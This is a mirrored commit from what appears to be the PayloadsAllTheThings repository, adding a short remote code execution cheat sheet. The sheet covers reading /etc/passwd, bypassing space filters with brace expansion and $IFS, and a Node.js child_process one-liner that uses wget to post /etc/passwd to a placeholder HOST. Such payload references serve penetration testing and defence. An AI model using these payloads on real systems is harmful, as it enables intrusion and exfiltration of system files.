mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
RCE payloads
This commit is contained in:
parent
2696be89ef
commit
031a3d72b5
1 changed files with 19 additions and 6 deletions
|
@ -1,12 +1,25 @@
|
|||
# Title
|
||||
Lorem
|
||||
# Remote Code Execution
|
||||
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
|
||||
|
||||
|
||||
## Vuln
|
||||
|
||||
Normal code execution
|
||||
```
|
||||
Code
|
||||
cat /etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
|
||||
```
|
||||
|
||||
|
||||
Code execution without space
|
||||
```
|
||||
{cat,/etc/passwd}
|
||||
cat$IFS/etc/passwd
|
||||
```
|
||||
|
||||
NodeJS Code execution
|
||||
```
|
||||
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
*
|
Loading…
Reference in a new issue